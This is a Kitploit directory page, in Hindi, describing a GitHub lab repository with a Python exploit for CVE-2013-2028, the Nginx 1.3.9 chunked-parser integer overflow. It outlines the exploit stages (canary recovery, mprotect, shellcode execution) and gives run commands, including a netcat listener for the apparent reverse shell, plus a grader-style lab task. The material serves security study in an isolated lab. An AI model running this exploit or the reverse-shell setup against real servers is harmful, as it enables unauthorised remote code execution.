Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2013-2028-Exploit — Docker-आधारित लैब और CVE-2013-2028 के लिए Python एक्सप्लॉइट, जो Nginx 1.3.9 chunked-parser integer overflow है, जिसमें canary recovery, mprotect, और shellcode execution शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/vanivamshi/cve-2013-2028-exploit
भेद्यता विश्लेषणशोषणशेलकोडसुरक्षा वर्चुअलाइजेशनपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषणलैब और अभ्यास
GitHubvanivamshi/cve-2013-2028-exploit

CVE-2013-2028-Exploit

Docker-आधारित लैब और CVE-2013-2028 के लिए Python एक्सप्लॉइट, जो Nginx 1.3.9 chunked-parser integer overflow है, जिसमें canary recovery, mprotect, और shellcode execution शामिल हैं।

रिपॉजिटरी देखें
8घं 3मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2013-2028 एक्सप्लॉइट

भेद्यता विवरण

भेद्य सॉफ़्टवेयर: Nginx 1.3.9

भेद्य फ़ंक्शन: ngx_http_parse_chunked

CVE-2013-2028, Nginx के HTTP chunked transfer encoding पार्सर में एक integer overflow भेद्यता है। इस प्रयोगशाला वातावरण द्वारा लक्षित परिस्थितियों के अंतर्गत, यह भेद्यता मेमोरी करप्शन का कारण बन सकती है और इसका उपयोग नियंत्रण प्रवाह को प्रभावित करने के लिए किया जा सकता है।

यह रिपॉज़िटरी भेद्यता का अध्ययन करने और शोषण कार्यप्रवाह को पुनरुत्पादित करने के लिए एक पृथक Docker-आधारित वातावरण प्रदान करती है।

शोषण विवरण

पूर्ण एक्सप्लॉइट में चार मुख्य चरण होते हैं:

  1. Stack canary recovery

    बाइट-दर-बाइट प्रोबिंग के माध्यम से stack canary को पुनर्प्राप्त करें।

  2. Memory protection manipulation

    प्रासंगिक पता जानकारी की गणना करें और नियंत्रित मेमोरी क्षेत्र पर mprotect को आमंत्रित करने के लिए आवश्यक नियंत्रण-प्रवाह अनुक्रम का निर्माण करें।

  3. Shellcode placement

    payload को नियंत्रित मेमोरी क्षेत्र में कॉपी करें।

  4. Control-flow transfer

    निष्पादन को नियंत्रित मेमोरी क्षेत्र में स्थानांतरित करें।

पूर्ण एक्सप्लॉइट भेद्य पार्सर को ट्रिगर करने से लेकर मेमोरी करप्शन और नियंत्रण-प्रवाह हेरफेर के माध्यम से नियंत्रित कोड निष्पादन तक की प्रगति को प्रदर्शित करता है।

आवश्यकताएँ

  • Docker
  • Docker Compose
  • Python 3
  • exploit.py द्वारा आवश्यक Python निर्भरताएँ
  • पूर्ण लैब द्वारा उपयोग किए जाने वाले लिसनर के लिए netcat

पुनरुत्पादन कैसे करें

1. लिसनर प्रारंभ करें

होस्ट सिस्टम पर, कॉन्फ़िगर किए गए पोर्ट पर एक लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvp 4345

एक्सप्लॉइट चलाते समय --listenerport (-lp) तर्क के साथ वही पोर्ट उपयोग करें।

2. भेद्य Nginx कंटेनर प्रारंभ करें

Docker वातावरण बनाएँ और प्रारंभ करें:

root@kitploit:~
sudo docker-compose up --build

भेद्य लक्ष्य कंटेनर के अंदर Nginx 1.3.9 चलाता है।

आप Nginx संस्करण को इस प्रकार सत्यापित कर सकते हैं:

root@kitploit:~
docker-compose exec cve-2013-2028 /usr/local/nginx/sbin/nginx -v

3. पूर्ण एक्सप्लॉइट चलाएँ

चलाएँ:

root@kitploit:~
python3 exploit.py \
    -ra 127.0.0.1 \
    -rp 8081 \
    -la <listener-machine-address> \
    -lp <listener-machine-port>

एक्सप्लॉइट भेद्य लक्ष्य को अंतिम payload भेजने से पहले canary-recovery और payload-construction चरणों को निष्पादित करता है।

यदि पहले से पुनर्प्राप्त canary उपलब्ध है, तो इसे इस प्रकार प्रदान किया जा सकता है:

root@kitploit:~
python3 exploit.py \
    -ra 127.0.0.1 \
    -rp 8081 \
    -la <listener-machine-address> \
    -lp <listener-machine-port> \
    -c '<canary>'

4. मध्यवर्ती कार्य

रिपॉज़िटरी भेद्यता-अनुसंधान कार्यप्रवाह के माध्यम से प्रगति का मूल्यांकन करने के लिए एक मध्यवर्ती कार्य भी प्रदान करती है।

चलाएँ:

root@kitploit:~
python3 intermediate_task.py \
    -ra 127.0.0.1 \
    -rp 8081 \
    -la <listener-machine-address> \
    -lp <listener-machine-port>

मध्यवर्ती कार्य अपनी जाँच सीधे चल रहे Docker लक्ष्य के विरुद्ध करता है। यह मैन्युअल रूप से बनाई गई साक्ष्य फ़ाइलों या मैन्युअल रूप से प्रदान किए गए JSON दावों पर निर्भर नहीं करता है।

यह कार्य दो क्षेत्रों को सत्यापित करता है:

भेद्यता पहचान

यह कार्य:

  • पुष्टि करता है कि लक्ष्य कंटेनर चल रहा है।
  • स्थापित Nginx संस्करण का पता लगाता है।
  • निर्धारित करता है कि पता लगाया गया संस्करण लैब द्वारा उपयोग किए जाने वाले भेद्य Nginx रिलीज़ से मेल खाता है या नहीं।

कॉन्फ़िगरेशन सत्यापन

यह कार्य:

  • पुष्टि करता है कि Docker कंटेनर चल रहा है।
  • पुष्टि करता है कि Nginx चल रहा है।
  • nginx -t का उपयोग करके Nginx कॉन्फ़िगरेशन को सत्यापित करता है।

कॉन्फ़िगरेशन जाँच यह स्थापित करती है कि Nginx कॉन्फ़िगरेशन वाक्यात्मक रूप से मान्य है। इसे अपने आप में CVE-2013-2028 के शमन का प्रमाण नहीं माना जाना चाहिए।

उदाहरण आउटपुट:

root@kitploit:~
============================================================
CVE-2013-2028 INTERMEDIATE TASK
============================================================

Target:
  nginx running:        True
  nginx version:        1.3.9
  vulnerable build:     True

Progress:
  [x] vulnerability_identified
  [x] configuration_validated

All required checks completed.
Exercise complete.

मध्यवर्ती कार्य इन रनटाइम जाँचों के परिणामों को यहाँ संग्रहीत करता है:

root@kitploit:~
grader_state.json

यह फ़ाइल केवल जाँचों द्वारा उत्पन्न स्थिति को बनाए रखने के लिए उपयोग की जाती है। यह भेद्यता निर्धारण का स्रोत नहीं है।

Docker लक्ष्य

प्रयोगशाला वातावरण जानबूझकर Nginx 1.3.9 का उपयोग करता है, जो CVE-2013-2028 से प्रभावित एक पुरानी Nginx रिलीज़ है।

Docker वातावरण भेद्यता अनुसंधान और शोषण अभ्यासों के लिए एक पृथक लक्ष्य प्रदान करता है। भेद्य सेवा तक केवल प्रयोगशाला कॉन्फ़िगरेशन द्वारा उजागर इंटरफ़ेस के माध्यम से ही पहुँचा जाना चाहिए।

अस्वीकरण

यह रिपॉज़िटरी केवल एक पृथक प्रयोगशाला वातावरण में शैक्षिक और अधिकृत सुरक्षा-अनुसंधान उद्देश्यों के लिए है।

उन सिस्टमों के विरुद्ध एक्सप्लॉइट न चलाएँ जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट प्राधिकरण नहीं है।

टूल डाउनलोड करें